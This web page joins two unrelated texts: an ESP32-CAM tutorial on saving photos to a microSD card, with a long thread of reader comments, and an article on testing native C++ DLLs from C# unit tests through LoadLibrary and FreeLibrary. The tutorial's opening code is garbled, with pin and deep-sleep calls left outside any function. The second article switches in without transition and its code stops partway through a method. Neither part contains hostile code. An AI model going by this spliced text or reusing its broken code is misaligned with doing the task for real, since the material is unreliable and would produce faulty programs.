            UnloadDll();
        }

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public static extern IntPtr LoadLibrary(string dllName);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public static extern int FreeLibrary(IntPtr handle);
    }
}
</C# Test Code>
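Not part of the original post: for comparison, the same load/call/unload pattern exists on POSIX systems, where dlopen/dlsym/dlclose stand in for LoadLibrary/GetProcAddress/FreeLibrary. Below is a hedged C sketch; the library path and the Return3 symbol name are carried over from the article purely for illustration.

```c
#include <dlfcn.h>
#include <stdio.h>

typedef int (*return3_fn)(void);

/* Load the shared library, call its exported Return3, then unload it
   so the library file can be rebuilt while this process keeps running
   (the same reason the article uses LoadLibrary/FreeLibrary). */
int call_return3(const char *path)
{
    void *handle = dlopen(path, RTLD_NOW);
    if (handle == NULL) {
        fprintf(stderr, "dlopen failed: %s\n", dlerror());
        return -1;
    }

    return3_fn fn = (return3_fn)dlsym(handle, "Return3");
    int result = (fn != NULL) ? fn() : -1;

    dlclose(handle); /* analogous to FreeLibrary */
    return result;
}
```

On older glibc systems this needs `-ldl` at link time; as with FreeLibrary, releasing the handle is what lets the shared object be replaced without restarting the process.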
https://blogs.msdn.microsoft.com/calvin_hsia/2014/11/25/create-managed-tests-for-native-code/
CC-MAIN-2017-51
refinedweb
1,270
57.67
There are many limitations placed on this code. I am still learning, so I need hints for this assignment. No extra variables, no macros or functions other than GetSubstring can be called. The main function cannot be changed. This is my code. Focus on the GetSubstring function part.

#include <stdio.h>
#include <stdlib.h>

char *GetSubstring(const char source[], int start, int count, char result[]);

int main(void)
{
    const char source[] = "one two three";
    char result[] = "123456789012345678";

    puts(GetSubstring("This is really fun", 2, 800, result));
    puts(GetSubstring("This is really fun", 261, 9, result));
    puts(GetSubstring("This is really fun", 0, 12, result));
    puts(GetSubstring(source, 5, 87, result));
    puts(GetSubstring(source, 18, 7, result));
    puts(GetSubstring(source, 6, 5, result));
    puts(GetSubstring(source, 0, 3, result));
    return (EXIT_SUCCESS);
}

char *GetSubstring(const char source[], int start, int count, char result[])
{
    char *copy = result;

    for (; *source != '\0' || *source == source[start]; start--)
    {
        while (*source != '\0')
        {
            *result++ = *source++;
        }
    }
    *result += '\0';
    return (copy);
}

Current output is:

This is really fun
This is really fun
This is really fun
one two threey fun
one two threey fun
one two threey fun
one two threey fun

Process returned 0 (0x0)   execution time : 0.082 s
Press any key to continue.
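As a hint, here is one hedged sketch of how GetSubstring could be corrected. Like the original attempt it uses a single local pointer (assuming that much is allowed under the "no extra variables" rule): skip up to start characters without running off the end of the string, copy at most count characters, and terminate with a plain assignment (*result = '\0'), not +=.

```c
/* One possible correct GetSubstring: copies at most count characters
   of source, beginning at index start, into result, and returns the
   start of result so it can be passed straight to puts(). */
char *GetSubstring(const char source[], int start, int count, char result[])
{
    char *copy = result;  /* remember the start of the output buffer */

    /* Advance to the start position, stopping early if the
       string is shorter than start (e.g. start = 261). */
    for (; start > 0 && *source != '\0'; start--) {
        source++;
    }

    /* Copy at most count characters, or until the string ends
       (count = 800 just copies the rest of the string). */
    for (; count > 0 && *source != '\0'; count--) {
        *result++ = *source++;
    }

    *result = '\0';  /* assignment, not the original's  *result += '\0'  */
    return copy;
}
```

With the main function from the post unchanged, the first call would then print "is is really fun" and the last one "one".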
http://forums.devshed.com/programming/933467-obtain-substring-string-please-look-last-post.html
CC-MAIN-2017-39
refinedweb
204
63.19
There is still ambiguity. Consider:

class Test
{
    static void Process();
    void Process();
    void AmbiguousCaller() { Process(); }
}

Does AmbiguousCaller() call static Test.Process() or does it call this.Process()? Aside from this, I believe there would also be ambiguity from MC++, where class statics can be invoked through an instance pointer.

I disagree with your belief that a user would get confused between the two function calls (at least not in C#). To call your static function you would have to invoke it as Test.Process(); to call your instance of the function you would have to use an instance: new Test().Process(); or Test obj = new Test(); obj.Process(); I can’t see how you could get confused here. I would also assume that the static function would perform the same functionality as the instance version of it, but the static probably handles the creation and destruction of the object. I.e., I would expect that the following would do the same: Guid.NewGuid(); new Guid().NewGuid(); Personally I think this is a time saver for end users of the component.

Q: Does AmbiguousCaller() call static Test.Process() or does it call this.Process()?
A: It calls this.Process(). You must use the class name to call a static function. So the only way to call the static function is to call Test.Process()

Well, in the current language specification you don’t *have* to use the class name to call a static method – so under the current specification, it *would* be ambiguous.

Excerpt from Microsoft Programming Languages (): "Shared members may be accessed in Visual Basic .NET through both the class name and an instance variable of the type to which they belong." That makes me wonder if in C# having to call a static member through the class name, and not allowing it to be called by an instance variable, is a C# imposition rather than a CLR one.

Um, OK, perhaps I am doing something wrong here. I just tried calling a static method without the class name in C# and it wouldn’t compile. I don’t use VB, so I am not sure how that is working. I am assuming that the compiler converts the instance call to the class call. So if this is the current specification, why isn’t C# or the CLR following it?

Could you give a sample of it not compiling? You have to use a class name if it’s a method of a *different* class, but if it’s a method in the same class, it’s okay. Here’s an example:

class Test
{
    static void Main()
    {
        new Test().InstanceMethod();
    }

    static void StaticMethod() { }

    void InstanceMethod()
    {
        StaticMethod();
    }
}

There is actually a very simple reason why it is illegal. In C# it is legal to have a local variable with the same name as a class. This means that if an instance member were named the same as a static member, there would be an ambiguity when a local variable had the same name as the class it represents. So consider the following legal C# code:

public class TestClass
{
    public TestClass() { }
    public static void MyStaticMethod() { }
    public void MyInstanceMethod() { }
}

public class StartUp
{
    public static Int32 Main(String[] args)
    {
        TestClass TestClass = new TestClass();
        TestClass.MyInstanceMethod();
        TestClass.MyStaticMethod();
        return 0;
    }
}

If MyInstanceMethod and MyStaticMethod were given the same name, there would be an ambiguity.

Why is it legal to have a local variable with the same name as a class in C#? Why not in VB.NET and other languages? If we didn’t allow a local variable to have the same name as a class, this confusion wouldn’t happen.

From what I have heard, VB.NET allows calling of static methods from a non-static context. Wouldn’t there be an ambiguity in that case when you use this test class to derive a descendant class in VB.NET?
https://blogs.msdn.microsoft.com/csharpfaq/2004/03/16/why-cant-i-have-static-and-instance-methods-with-the-same-name/
CC-MAIN-2017-13
refinedweb
682
73.58
On Wed, Dec 29, 2004 at 11:51:48PM -0800, Matthew Dillon wrote:
>
>:...
>:level aren't we concerned about one thing? Atomic transactions. However
>:many "hot" physical devices there are across whatever network, shouldn't
>:they all finish before the exit 0?
>:
>:Minimizing the data to transfer across the slowest segment to a physical
>:device will lower transfer times, unless that procedure (eg compression)
>:outweighs the delay. (I wonder if it is possible to send less data by
>:only transmitting the _changes_ to a block device...)
>
>     Your definition of what constitutes an 'atomic transaction' is not
>     quite right, and that is where the confusion is stemming from.
>
>     An atomic transaction (that is, a cache-coherent transaction) does not
>     necessarily need to push anything out to other machines in order to
>     complete the operation. All it needs is mastership of the data or
>     meta-data involved. For example, if you are trying to create a
>     file O_CREAT|O_EXCL, all you need is mastership of the namespace
>     representing that file name.
>
>     Note that I am NOT talking about a database 'transaction' in the
>     traditional hard-storage sense, because that is NOT what machines need
>     to do most of the time.

I. As for the magic of VFS, that's all golden and I hope it works! I
really wanted to clarify the above paragraph, or get on the same page as
far as how the system works. Per your earlier example, the 3 hot mirrors
broadcast their intent to write a file (first come, first write basis)
via the cache coherency protocol, the journal socket then comes with
specific details, and the remaining 2 (and indeed the first) hot devices
block file reads until the IO of associated writes is complete across
the 3 machines; since this blocking comes from the kernel (VFS?), there
is no multiple-partially-written-file race condition. The remaining 20
hosts get notice from the VFS per the coherent cache protocol, followed
by journal and IO, from the 3 hot mirrors.

>
>?
>     In other words, your machine would be able to execute the create operation
>     and return from the open() without having to synchronously communicate
>     with anyone else, and still maintain a fully cache coherent topology
>     across the entire cluster.

Do you mean a warm mirror can commit to local disk and trigger the 3 hot
mirrors to sync up and propagate to the other 20? Slick!

>     The management of 'mastership' of resources is the responsibility of the
>     cache coherency layer in the system. It is not the responsibility of the
>     journal. The journal's only responsibility is to buffer the operation
>     and shove it out to the other machines, but that can be done
>     ASYNCHRONOUSLY, long after your machine's open() returned. It can do
>     this because the other machines will not be able to touch the resource
>     anyway, whether the journal has written it out or not, because they
>     do not have mastership of the resource... they would have to talk to
>     your machine to gain mastership of the resource before they could mess
>     with the namespace, which means that your machine then has the opportunity
>     to ensure that the related data has been synchronized to the requesting
>     machine (via the journal) before handing over mastership of the data to
>     that machine.

If mastership can freely (with restrictions!) move to any box in the
system, doesn't that dictate that the cache coherent system must be
organized _outside_ of all the systems? Since we can't expect something
from nothing, the steady state should be just that, nothing. All the
disks are in sync, and they know so because they processed all prior
coherent signals: warning, a journal entry in the pipe (coming, to be
followed by an IO). Each box listens for external coherency signals
(inode by UDP, ICMP?) and prepares for a journal and IO. Maybe better
than silent!

>:But here are a few things to ponder: will a 1Gb nfs or 10Gb fiber to a
>:GFS on a fast raid server just be better and cheaper than a bunch of
>:warm mirrors? How much of a performance hit will the journaling code
>:be, especially on local partitions with kernels that only use it for a
>:"shared" mount point? djbdns logging is a good example: even if you log to
>:/dev/null, generation of the logged info is a significant performance
>:hit for the app. I guess all I'm saying is, if the journaling is not
>:being used, bypass it!
>
>     Well, what is the purpose of the journaling in this context? If you
>     are trying to have an independent near-realtime backup of your
>     filesystem then obviously you can't consolidate it into the same
>     physical hardware you are running from normally, that would kinda kill
>     the whole point.

I'm not making a purpose for journaling here, just considering the
options, again from a simplistic perspective. If the idea behind a cache
coherent cluster filesystem is performance (it seems there are other
advantages too), how does the bang-for-buck benchmark compare between
coherent nodes with local disks, and diskless clients using a single
striped, mirrored (realtime backup) raid NFS? Or, if you have a lot more
than 20 hosts, fiber GFS? Or maybe you are looking for a solution other
than brute-force performance?

>?
>     The key to performance is multifold. It isn't just minimizing the
>     amount of data transferred... it's minimizing latency, it's being able to
>     asynchronize data transfers so programs do not have to stall waiting

I didn't mean the cluster needs to be synchronized, just _file_
read/writes... advantages/disadvantages

>?
>     You can think of the cache coherency problem somewhat like the way
>     cpu caches work in SMP systems. Obviously any given cpu does not have
>     to synchronously talk to all the other cpus every time it does a memory
>     access. The reason: the cache coherency protocol gives that cpu certain
>     guarantees in various situations that allow the cpu to access a great
>     deal of data from cache instantly, without communicating with the other
>     cpus, yet still maintain an illusion of atomicity. For example, I'm sure
>     you've heard the comments about the overhead of getting and releasing a
>     mutex in FreeBSD: "It's fast if the cpu owns the cache line".
>     "It's slow if several cpus are competing for the same mutex but fast if
>     the same cpu is getting and releasing the mutex over and over again".
>     There's a reason why atomic bus operations are sometimes 'fast' and
>     sometimes 'slow'.

Recently I heard AMD engineer David O'Brien present the advantages and
nuances of working with the AMD64. SMP NUMA caching scenarios were
discussed at length. What's not in the CPU (or motherboards) is a means
to do a controlled flash copy (a la DMA) of one memory region to
another, the idea being: if a 4-way CPU becomes free it can offload a
process from another CPU's queue, and get the associated memory too,
without tying up a cpu using the regular memory bus. A system a lot like
how your "multiple path to sync" filesystem's coherent cache system
seems to want to work.

Regards,
// George

--
George Georgalis, systems architect, administrator Linux BSD IXOYE
cell:646-331-2027 mailto:george@xxxxxxxxx
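Dillon's mastership argument (local writes need no synchronous network traffic, pending journal entries replicate asynchronously, and a mastership transfer forces a sync first) can be sketched as a toy model. This is a hedged illustration only; the type and function names (resource, local_write, acquire_mastership) are invented for the sketch and are not DragonFly code.

```c
/* Toy model of resource mastership in a cache-coherent cluster. */

struct resource {
    int master;           /* node id currently allowed to modify it */
    int pending_journal;  /* journal entries not yet replicated     */
};

/* A local write needs no synchronous network traffic if this node
   already holds mastership; the journal entry is pushed out later,
   long after the caller's open()/write() has returned. */
int local_write(struct resource *r, int node)
{
    if (r->master != node)
        return -1;        /* must acquire mastership first */
    r->pending_journal++; /* replicated asynchronously */
    return 0;
}

/* Handing mastership to another node: the old master synchronizes
   its pending journal to the requester before the transfer, so the
   new master never sees stale data. */
void acquire_mastership(struct resource *r, int node)
{
    if (r->master == node)
        return;
    r->pending_journal = 0;  /* simulated flush to the requester */
    r->master = node;
}
```

The point of the sketch is the asymmetry: writes by the current master are instant and local, and the only synchronous cost appears at the moment mastership moves.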
http://leaf.dragonflybsd.org/mailarchive/kernel/2004-12/msg00137.html
CC-MAIN-2013-48
refinedweb
1,197
58.52
(It's a blog.) December 28, 2013 at 5:06 pm filed under Coding Tagged FP, lisp, macros, racket Man, just when I thought I’d started to understand macros, I stumble across Racket. Don’t get me wrong. I’m still enjoying my foray into Racket. But if, for instance, you started out trying to understand Lisp macros via On Lisp, you may be in for some trouble. Yes, as far as I can tell, the usual syntax like `(foo ,bar ,@baz) will work. But if you begin to read the section of the Racket Guide about macros, it becomes clear that there’s much, much more to the picture. This is really just me thinking out loud as I work this out. I’m more sure of some things than others, and I’ll try to make clear which is which, but consider this a blanket caveat. I think I agree with the folks who’ve suggested that while it’s easy to find trivial or complex Racket macro examples, it’s hard to find examples of moderate complexity. The nice thing is that Fear of Macros exists. I began reading my way through it today. Macros in Racket seems to be built around a relatively simple idea: make syntax first class. I am not certain, but I am pretty sure that syntax like backticks, et al, are not functions. At a minimum they aren’t atoms, right? You can’t map backticks over a list of atoms, or funcall or apply it. ,, @, and backticks are all reader directives (the R in REPL), which is distinct from the environment (the E or eval in REPL). They exist at a more fundamental level to enable Lisp’s clever syntax. I don’t think there’s anything wrong with that, necessarily, but it’s interesting to contemplate Racket’s assertion that syntax should be a first-class datatype, beyond just a list. So that’s why you end up with concepts like transformers. A macro written in this way isn’t mucking around with the reader directly. (Maybe that’s how it’s implemented, though.) Rather, you’re working in a different namespace, or the moral equivalent, at compile time. 
A macro then becomes a function which receives a syntax object, which the programmer can manipulate via a number of other primitives. It gets a little confusing here, though, because a syntax object isn’t just a glorified AST or what have you. Functions like syntax->datum will recurse through a syntax object representing (+ 1 (* 2 3)) and yield just that, whereas others may only recurse one level, providing a syntax object for (e.g.) + and *. AIUI, these syntax objects know something about the scope in which they were introduced. And this is important because if you’re just operating at a textual substitution level, you can run into problems with scope. Is it a bit like closures? I think so, with the caveat that this would be during the compilation phase, before “real” code is executed. What do I mean by “real” code? Well, I put that in quotes because there’s not much of a difference in reality. I think it has to do with phases. So during the compile phase, you can perform computation. You could write a macro my-+ which performed addition at compile time, right? Or a real example of computation might be to take a declaration like (struct person (id name phone)) and declare accessors make-person, person-id, and so on. This is how any Lisp macro works, so I’m not singling out Racket as special. So if you consider that compile time is itself just another phase in program evaluation, issues of lexical scope and such take on a new meaning. Also, yeah, far as I can tell, in Racket there are interesting phases or times in addition to compile time. In fact I think you can arbitrarily nest phases. I wanted to say that this is the moral equivalent of nesting backticks, but I don’t think that’s accurate enough to help. To put it grossly, backticks are a way to require another layer of evaluation. Put another way, you put backticks around something to delay its evaluation by one application of eval, and a comma to remove a “layer” of delay. 
Digression: sometimes I try to think about this like when you have nested quotes in prose: “Alice said ‘drink this,’ so I did,” Bob said. You have three layers of nesting here: story-level (“Bob said”), Bob-level (“Alice said”), and Alice-level (“drink this”). English isn’t quite as regimented as code, but it does have rules for quotes. End digression. (You know, as if this whole thing isn’t a digression.) I believe backticks, et al, are quite distinct from “phases” in Racket. Backticks are (again) a syntactic construct for consumption by the reader. The environment doesn’t come into play because eval doesn’t care where your lists came from; they’re “just” lists. This is advantageous in terms of simplicity, I’d expect. Conversely, a syntax object might actually know what symbols, et al, it’s referring to. There’re a pile of Racket functions oriented around this concept. You can play with this at the REPL: The third expression at the prompt is interesting only because syntax-e parses a syntax objects into its constituent parts. The subsequent expression extracts foo as a syntax object and then compares it to another syntax object representing the same foo. All right, I went through all that to flesh out my own mental model for why you might want a richer datatype to represent syntax, rather than “just” lists with reader directives. The way this ends up working in Racket is that a macro receives a syntax object rather than a list of its arguments. The macro is free to manipulate that object (e.g. using syntax-e or syntax->datum). The transformer returns something which is evaluated. With that in mind, this surprised me a little bit: eval-ing a syntax object is equivalent to eval-ing a datum. Okay. I think it’s only functionally equivalent, because of how I set up the example. Specifically, the first example is “portable” to other scopes, and it’ll be able to resolve foo whether foo exists in the current context. 
The second example will evaluate foo in the current context, possibly failing. To expand on that: say foo didn’t exist at runtime. Or it evaluates to something different at runtime vs compile-time. In the former case, the sharp-quoted version would still work (assuming that it was a proper macro) whereas the datum version would error out. In the latter case, the computations would each evaluate to something different. Interestingly, in the latter case, that’s actually probably what you want! That’s because they’re distinct times, and you wouldn’t want a run-time binding to trample a compile-time binding, right? Hmm. In the next post I’ll think a little more about the interesting pieces this enables, how it changes how I look at macros in Racket, and maybe I’ll even try to understand them. I don’t think, in aggregate, that it’s really all that different in terms of manipulating lists. The extra pieces come from the syntax object, and what happens when your functions and constructs know something about what they’re manipulating. You can have richer affordances and such. So that’ll be interesting to contemplate.
http://incrediblevehicle.com/2013/12/28/macros-in-racket-what/
CC-MAIN-2017-22
refinedweb
1,262
63.8
Results Transformers

Results Transformers have been introduced in RavenDB 2.5 to give the user the ability to do server-side projections (with the possibility of loading data from other documents). Result Transformers supersede the index TransformResults feature, marking it as obsolete. The main features of the Result Transformers are:

I. Stand-alone, separated from the index.

public class Order
{
    public DateTime OrderedAt { get; set; }
    public Status Status { get; set; }
    public string CustomerId { get; set; }
    public IList<OrderLine> Lines { get; set; }
}

public class OrderStatisticsTransformer : AbstractTransformerCreationTask<Order>
{
    public OrderStatisticsTransformer()
    {
        TransformResults = orders => from order in orders
                                     select new
                                     {
                                         order.OrderedAt,
                                         order.Status,
                                         order.CustomerId,
                                         CustomerName = LoadDocument<Customer>(order.CustomerId).Name,
                                         LinesCount = order.Lines.Count
                                     };
    }
}

II. Users can apply them to index results on demand. What does that mean? It means that if you want to load the whole Order you can do so by not using a transformer in the query:

IList<Order> orders = session.Query<Order>()
    .Where(x => x.CustomerId == "customers/1")
    .ToList();

or if you want to get your transformed results, then you can execute the query as follows:

public class OrderStatistics
{
    public DateTime OrderedAt { get; set; }
    public Status Status { get; set; }
    public string CustomerId { get; set; }
    public string CustomerName { get; set; }
    public int LinesCount { get; set; }
}

IList<OrderStatistics> statistics = session.Query<Order>()
    .TransformWith<OrderStatisticsTransformer, OrderStatistics>()
    .Where(x => x.CustomerId == "customers/1")
    .ToList();

III. Can be used with automatic indexes.

OrderStatistics statistic = session.Load<OrderStatisticsTransformer, OrderStatistics>("orders/1");

The comments section is for user feedback or community content. If you seek assistance or have any questions, please post them at our support forums.

Is it possible to query an index from a transformer? Or would that make it too complicated?

Is this included in the first 2.5 release (2.5.2666)?

In this example Order does not have an Id property. Assuming it did have one, how would we reference it in our result? Currently I am getting an error that reads "Could not read value for property Id".

How can a result transformer be used with the .NET API to return polymorphic types? In other words, how can I write a VehicleTransformer so that when I use .TransformWith<VehicleTransformer, Vehicle>(), I can receive back an enumeration of Cars, Boats, and Motorcycles?

How can result transformers be used in conjunction with search clauses? I can't get them to play nice together.
http://ravendb.net/docs/2.5/client-api/querying/results-transformation/result-transformers?version=2.5
CC-MAIN-2014-42
refinedweb
390
50.12
Welcome to Blazor!

Blazor is a framework for building interactive client-side web UI with .NET: create rich interactive UIs using C# instead of JavaScript. The Blazor framework uses a WebAssembly-based .NET runtime (client-side Blazor) and server-side ASP.NET Core (server-side Blazor).

Using .NET for client-side web development offers a number of advantages.

Blazor apps are based on components. A component in Blazor is an element of UI, such as a page, dialog, or data entry form. Components are .NET classes built into .NET assemblies. The component class is usually written in the form of a Razor markup page with a .razor file extension. Components in Blazor are formally referred to as Razor components. Razor is a syntax for combining HTML markup with C# code, designed for developer productivity.

The following Razor markup demonstrates a component (Dialog.razor), which can be nested within another component:

<div>
    <h1>@Title</h1>
    @ChildContent
    <button @onclick="OnYes">Yes!</button>
</div>

@code {
    [Parameter]
    public string Title { get; set; }

    [Parameter]
    public RenderFragment ChildContent { get; set; }

    private void OnYes()
    {
        Console.WriteLine("Write to the console in C#! 'Yes' button was selected.");
    }
}

The dialog's body content (ChildContent) and title (Title) are provided by the component that uses this component in its UI. OnYes is a C# method triggered by the button's onclick event. Blazor uses natural HTML tags for UI composition. HTML elements specify components, and a tag's attributes pass values to a component's properties. In the following example, the Index component uses the Dialog component.
ChildContent and Title are set by the attributes and content of the <Dialog> element.

Index.razor:

@page "/"

<h1>Hello, world!</h1>

Welcome to your new app.

<Dialog Title="Blazor">
    Do you want to <i>learn more</i> about Blazor?
</Dialog>

The dialog is rendered when the parent (Index.razor) is accessed in a browser. When this component is used in the app, IntelliSense in Visual Studio and Visual Studio Code speeds development with syntax and parameter completion. Components render into an in-memory representation of the browser's Document Object Model (DOM) called a render tree, which is used to update the UI in a flexible and efficient way.

Blazor WebAssembly

Blazor WebAssembly is a single-page app framework for building interactive client-side web apps with .NET. Blazor WebAssembly uses open web standards, without plugins or code transpilation. .NET code executed via WebAssembly in the browser runs in the browser's JavaScript sandbox, with the protections that the sandbox provides against malicious actions on the client machine. The size of the published app, its payload size, is a critical performance factor for an app's usability: a large app takes a relatively long time to download to a browser, which diminishes the user experience, so Blazor WebAssembly optimizes payload size to reduce download times.

Blazor Server

Blazor decouples component rendering logic from how UI updates are applied. Blazor Server provides support for hosting Razor components on the server in an ASP.NET Core app. UI updates are handled over a SignalR connection. The runtime handles sending UI events from the browser to the server and applies UI updates sent by the server back to the browser after running the components. The connection used by Blazor Server to communicate with the browser is also used to handle JavaScript interop calls.

Learn Blazor WebAssembly - Build Your First Web Application

Join Jeff Fritz as he takes you through the steps to build your first application that runs in the browser with C# and Blazor. Blazor is a new framework that allows you to write .NET code that runs on WebAssembly technology inside the browser. By the end of this video, you'll learn how to build a next-generation SPA (single-page application) using HTML, CSS, JavaScript interop, and Blazor.

What is Blazor? Learn how to build client-side Web apps using Blazor and how to secure them with Auth0.

Blazor CRUD App tutorial - SPA Framework for .NET developers

In this Blazor tutorial, we will see how to create a simple CRUD (Create, Read, Update and Delete) application for ASP.NET Core Blazor using Visual Studio 2019, .NET Core 3, Entity Framework and Web API. Blazor is a new framework introduced by Microsoft. We will make a Blazor app that communicates with an ASP.NET Core Web API to read and store data in a database with the help of Entity Framework Core.

Blazor has two kinds of application development: the Blazor Client app, which is in preview now, and the Blazor Server app. The Blazor Client app runs in WebAssembly; the Blazor Server app runs using SignalR. Blazor apps can be created using C#, Razor, and HTML instead of JavaScript, and Blazor WebAssembly works in all modern web browsers, including mobile browsers. The main advantage of Blazor is that C# code files and Razor files are compiled into .NET assemblies. Blazor has reusable components; a Blazor component can be a page, a dialog, or an entry form, and Blazor can also be used to create single-page applications.

Prerequisites

Step 1 - Create a database and a table

We will be using our SQL Server database for our Web API and EF. First, we create a database named CustDB and a table named CustomerMaster. Here is the SQL script to create the database, the table, and a sample-record insert query. Run the query given below in your local SQL Server to create the database and table to be used in our project.
USE MASTER
GO

-- 1) Check whether the database exists; if it does, drop it and create a new DB
IF EXISTS (SELECT [name] FROM sys.databases WHERE [name] = 'CustDB')
DROP DATABASE CustDB
GO
CREATE DATABASE CustDB
GO
USE CustDB
GO

-- 2) Customer master table
IF EXISTS (SELECT [name] FROM sys.tables WHERE [name] = 'CustomerMaster')
DROP TABLE CustomerMaster
GO
CREATE TABLE [dbo].[CustomerMaster](
    [CustCd] [varchar](20) NOT NULL,
    [CustName] [varchar](100) NOT NULL,
    [Email] [nvarchar](100) NOT NULL,
    [PhoneNo] [varchar](100) NOT NULL,
    [InsertBy] [varchar](100) NOT NULL,
    PRIMARY KEY (CustCd)
)

-- Insert sample data into the customer master table
INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C001','ACompany','[email protected]','01000007860','Shanun')
INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C002','BCompany','[email protected]','0100000001','Afraz')
INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C003','CCompany','[email protected]','01000000002','Afreen')
INSERT INTO [CustomerMaster] (CustCd,CustName,Email,PhoneNo,InsertBy) VALUES ('C004','DCompany','[email protected]','01000001004','Asha')

SELECT * FROM CustomerMaster

Step 2 - Create an ASP.NET Core Blazor Server Application

After installing all the prerequisites listed above, click Start >> Programs >> Visual Studio 2019 >> Visual Studio 2019 on your desktop. Click New >> Project. Click Create a new project to create our ASP.NET Core Blazor application. Select Blazor App and click the Next button. Select your project folder, enter your project name, and then click the Create button. Select Blazor Server App.

After creating the ASP.NET Core Blazor server application, wait for a few seconds. You will see the structure below in Solution Explorer. In the Data folder we can add all our model, DbContext, service, and controller classes; we will see that in this article.
In the Pages folder we add all our component files; every component file should have the .razor extension. In the Shared folder we can edit the left menu in the NavMenu.razor file and change the main content in the MainLayout.razor file. In the _Imports.razor file we can see the set of imports that is available in all component pages. In the App.razor file we add the main component to be displayed by default when the app runs in the browser. appsettings.json can be used to add the connection string. Startup.cs is an important file where we add all our endpoints (for example, controller endpoints), register the HttpClient, and add services and the DbContext in the startup configuration methods.

Debugging in a component

A big advantage of Blazor is that we can use our C# code in Razor files, set a breakpoint in the code part, and debug in the browser to check that all our business logic is working properly and to trace any kind of error easily. For this we take the existing Counter component page. In the Counter page there is a button, and the button click calls a method that performs the increment. We add one more button, and in its click event we call a method and bind a name in our component page.

In the HTML design part we add the code below:

<h1>My Blazor code part</h1>
My Name is : @myName
<br />
<button class="btn btn-primary" @onclick="ClickMe">Click Me</button>

Note that all the C# code and functions are written inside the @code {} block. We add the ClickMe method and declare a property to bind the name inside the @code block:

[Parameter]
public string myName { get; set; }

private void ClickMe()
{
    myName = "Shanu";
}

The complete Counter component page combines these pieces. Now let's add a breakpoint in our ClickMe method. Run the program and open the Counter page. When we click the Click Me button we can debug and check the value from the breakpoint we placed.
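Combining the snippets above, the complete Counter component might look like the following sketch. The original article showed its full listing only as an image, so the page route, heading text, and button styling here are assumptions:

```razor
@page "/counter"

<h1>Counter</h1>

<p>Current count: @currentCount</p>
<button class="btn btn-primary" @onclick="IncrementCount">Click me</button>

<h1>My Blazor code part</h1>
My Name is : @myName
<br />
<button class="btn btn-primary" @onclick="ClickMe">Click Me</button>

@code {
    private int currentCount = 0;

    // Original handler from the Counter template.
    private void IncrementCount()
    {
        currentCount++;
    }

    [Parameter]
    public string myName { get; set; }

    // Our added handler: sets the name that @myName renders above.
    private void ClickMe()
    {
        myName = "Shanu";
    }
}
```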
Now let's look at performing CRUD operations using Entity Framework and a Web API in Blazor.

Step 3 - Using Entity Framework

To use Entity Framework in our Blazor application we need to install the packages below:

Microsoft.EntityFrameworkCore.SqlServer - for using EF with SQL Server
Microsoft.EntityFrameworkCore.Tools - EF tooling for SQL Server
Microsoft.AspNetCore.Blazor.HttpClient - for communicating with the Web API from our Blazor component

First we will add Microsoft.EntityFrameworkCore.SqlServer. Right-click the project and click Manage NuGet Packages. Search for each of the three packages and install all of them as in the image below.

Add the DB connection string

Open the appsettings file and add the connection string as in the image below.

"ConnectionStrings": {
    "DefaultConnection": "Server=DBServerName;Database=CustDB;user id=SQLID;password=SQLPWD;Trusted_Connection=True;MultipleActiveResultSets=true"
},

Create the model class

Next, we need to create a model class with the same name as our SQL table and define property fields matching our SQL field names, as below. Right-click the Data folder and create a new class file named "CustomerMaster.cs". In the class we add property names matching our table column names, as in the code below.

[Key]
public string CustCd { get; set; }
public string CustName { get; set; }
public string Email { get; set; }
public string PhoneNo { get; set; }
public string InsertBy { get; set; }

Create the DbContext class

Next, we need to create the DbContext class. Right-click the Data folder and create a new class file named "SqlDbContext.cs". We add the code below to the DbContext class in order to wire up the SQL context and add a DbSet for our CustomerMaster model.
public class SqlDbContext : DbContext
{
    public SqlDbContext(DbContextOptions<SqlDbContext> options)
        : base(options)
    {
    }

    public DbSet<BlazorCrudA1.Data.CustomerMaster> CustomerMaster { get; set; }
}

Adding the DbContext in Startup

Add the DbContext in the ConfigureServices method of Startup.cs with the code below, passing the connection string we use to connect to SQL Server and the database.

services.AddDbContext<SqlDbContext>(options =>
    options.UseSqlServer(Configuration.GetConnectionString("DefaultConnection")));

Note that in the ConfigureServices method we can also see that the WeatherForecast service has been added. If we create a new service, we need to register it in ConfigureServices in the same way:

services.AddSingleton<WeatherForecastService>();

Creating the Web API for CRUD operations

To create our Web API controller, right-click the Controllers folder and click Add >> New Controller. Here we will use the scaffolding method to create our Web API. Select "API Controller with actions, using Entity Framework" and click the Add button. Select our model class and DbContext class and click Add.

Run the program and paste the API path /api/CustomerMasters/ into the browser to test our output. If you see an error, it means we need to add the controller endpoints in the Configure method of the Startup.cs file. Add endpoints.MapControllers(); inside UseEndpoints, as in the code below:

app.UseEndpoints(endpoints =>
{
    endpoints.MapControllers();
    endpoints.MapBlazorHub();
    endpoints.MapFallbackToPage("/_Host");
});

Now run again and check /api/CustomerMasters/ to see the JSON data from our database. Next we will bind this Web API JSON result in a component.

Working with the client project

First, we need to add a Razor component page.

Add a Razor component

To add a Razor component page, right-click the Pages folder of the project.
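The article describes the scaffolding steps but does not show the generated controller. A trimmed sketch of what a scaffolded CustomerMastersController typically looks like is below; the exact code the scaffolder produces may differ, and the namespace usage is an assumption:

```csharp
using System.Collections.Generic;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using Microsoft.EntityFrameworkCore;
using BlazorCrudA1.Data;

[Route("api/[controller]")]
[ApiController]
public class CustomerMastersController : ControllerBase
{
    private readonly SqlDbContext _context;

    public CustomerMastersController(SqlDbContext context)
    {
        _context = context;
    }

    // GET: api/CustomerMasters
    [HttpGet]
    public async Task<ActionResult<IEnumerable<CustomerMaster>>> GetCustomerMaster()
    {
        return await _context.CustomerMaster.ToListAsync();
    }

    // GET: api/CustomerMasters/C001
    [HttpGet("{id}")]
    public async Task<ActionResult<CustomerMaster>> GetCustomerMaster(string id)
    {
        var customer = await _context.CustomerMaster.FindAsync(id);
        if (customer == null) return NotFound();
        return customer;
    }

    // POST: api/CustomerMasters
    [HttpPost]
    public async Task<ActionResult<CustomerMaster>> PostCustomerMaster(CustomerMaster customer)
    {
        _context.CustomerMaster.Add(customer);
        await _context.SaveChangesAsync();
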